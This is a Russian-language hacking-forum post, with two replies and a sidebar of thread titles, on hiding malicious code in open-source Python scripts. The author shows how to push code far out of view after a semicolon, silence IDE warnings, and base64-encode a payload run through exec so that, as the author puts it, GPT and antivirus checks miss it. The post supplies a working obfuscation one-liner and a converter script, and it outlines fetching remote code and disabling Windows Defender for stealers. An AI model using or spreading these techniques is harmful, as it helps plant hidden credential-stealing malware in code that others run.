How they leak GitHub now or how open python scripts can put you on *******

Хаус · Aug 25, 2024

Привет!
Не так давно наткнулся на интересную вещь:
Все мы знаем, что в нашем любимом питоне можно использовать точки с запятой, как и писать весь скрипт в одну строчку (ахуеть).
Да, это не выглядит так, что это можно использовать в корыстных целях, да и по PEP8 такое не разрешается. Но давайте честно: в ваших скриптах вас давно волновал PEP8? Меня к сожалению, не слишком (по моему говнокоду понятно)
Ближе к сути:
Что выведет данный скрипт?

⁡Hello World!
⁡? Если вы ответили так, то вы частично правы, но есть загвоздка…
Никак не меняя скрипт, в выводе мы получаем это:

Откуда же взялся lolzteam?

Да, возможно, некоторые уже догадались, в чем дело.
Всем кто все еще не понял, где хранится print('lolzteam'), давайте разберем по полкам:

Т.к. в питоне мы имеем право разделять линии точкой с запятой, значит мы можем и увести на какую угодно длину, после чего прописать весь наш злой скрипт

А # type: ignore нам нужен для предотвращения предупреждений со стороны IDE (К примеру VSC) (на пайчарме это вроде как не работает, вуху!)
В любой строке мы можем сделать такой "подарок", докинув это какой-нибудь шифровкой base64, к примеру, чтобы всякие чатыгпт не ругались

Ладно, я бы не так сильно об этом задумывался, но если не репортить такие шифрованные репы гитхаба, получится так себе, ибо с тем же base64, репозитории будут храниться, как ни в чем не бывало.

Вкратце говоря, подшифруя код при помощи base64 и выполняя его с помощью exec, вирус не обнаружит GPT (как некоторые любят проверять), а учитывая то, что не компилированные python-скрипты почти не определяются антивирусами как потенциально опасные, *******ы на питоне обретают новый смысл
Безусловно, минус в полной открытости *******а остаётся, но никто не запрещает вам отрубать защитник виндоус и подгружать какой угодно файл, хоть .exe и исполнять его

P.s.: В теме должен был быть один из разборов такого *******а и слив его исходников,

домен уже снесли, а соответственно и данные *******а тоже (ахуеть, домен на .ru + слово ******* прямо в домене, парень не боялся ничего)

Если есть вопрос, как это реализовать:

Создаём get запрос на сервер, на котором хранится наш актуальный зашифрованный питоне скрипт

Расшифровываем и используем его прямо в скрипте используя exec:
Код:
;import base64;tochno_ne_stiller = base64.b64decode("J3ByaW50KCJsb2x6dGVhbSIpOyBwcmludCgiSSBsb3ZlIEBicmVkY29va2llIik7IHByaW50KCJiZXN0IHRlbGVncmFtIGV2ZXIiKSc=").decode('utf-8').strip("'");exec(tochno_ne_stiller)

Python
;import base64;tochno_ne_stiller = base64.b64decode("J3ByaW50KCJsb2x6dGVhbSIpOyBwcmludCgiSSBsb3ZlIEBicmVkY29va2llIik7IHByaW50KCJiZXN0IHRlbGVncmFtIGV2ZXIiKSc=").decode('utf-8').strip("'");exec(tochno_ne_stiller)
Полный код:

Вывод:

(первые три строки из нашего base64)
Радуемся жизни и логу (ну или че вы там подкачаете)
В дополнение, написал небольшой скрипт, который переработает ваш обычный скрипт в однострочный и переведет в Base64
import base64

def process_and_encode_py_file(file_path):
with open(file_path, 'r') as file:
lines = file.readlines()
single_line_code = ''.join(line.strip() + ';' for line in lines)
encoded_code = base64.b64encode(single_line_code.encode('utf-8')).decode('utf-8')
return encoded_code

file_path = input('Enter filename: ')
encoded_code = process_and_encode_py_file(file_path)
print(encoded_code)
with open('converted.rbf', 'a') as file:
file.write(encoded_code)
print('Base64 encoded and writed to converted.rbf')

Python
import base64



def process_and_encode_py_file(file_path):

    with open(file_path, 'r') as file:

        lines = file.readlines()

    single_line_code = ''.join(line.strip() + ';' for line in lines)

    encoded_code = base64.b64encode(single_line_code.encode('utf-8')).decode('utf-8')

    return encoded_code



file_path = input('Enter filename: ')

encoded_code = process_and_encode_py_file(file_path)

print(encoded_code)

with open('converted.rbf', 'a') as file:

    file.write(encoded_code)

    print('Base64 encoded and writed to converted.rbf')

Kenpachi_inactive8655299 · Aug 25, 2024

да и по PEP8 такое не разрешается. Но давайте честно: в ваших скриптах вас давно волновал PEP8?
Click to expand...

А PEP8 это какой то стандарт языка чтобы его соблюдать?. Я тебя удивлю но это не более чем простая рекомендация к написанию кода

BlackLime · Aug 27, 2024

бля во годнота, спасибо, буду теперь проверять на такие подарки исходы

We create beautiful and interesting websites without programming knowledge.

[XenForo] Making your own forum | FAQ About XenForo

Cheat everything for FREE..

We get 18+ plums for free + monetization

10 little-known but useful neurons

Changing the Steam interface in 5 minutes (v2)

How to return money from a blocked account on Playerok

Correct Abuzim Scooter 500/501

We quickly get a Torus proxy and swap the IP address directly in the browser | SQTorProxy

We remove the debt from the Whoosh account

Download and activate Windows and Microsoft Office without using third-party programs

HTML layout of letters. From work experience

[Article] - Why is Funpay bad? | The whole truth about this site

A new era of searching for existing Bitcoin addresses or a small discovery.

Getting Steam working correctly

How to download video | YouTube | Twitch | pornhub | TikTok |

Using Google Gemini without *** using an API key

Free subscription Cursor Pro forever | Cursor VIP

We catch an unscrupulous seller of grandfathers

PASTA / Guide. How to fuck chicks to get them to cum?

We make and publish premium emoji

Stop being a fat fuck.

Changing the build icon

Download almost all programs for free

[2025] How to get Figma Professional for 2 years for free.

Collection of profile designs in STEAM

[2025] Working with **** for beginners and more

Twitter base (x) ADS

Information about Twitter status (x) ADS

TON DNS — кастомный адрес для вашего TON кошелька

How they leak GitHub now or how open python scripts can put you on *******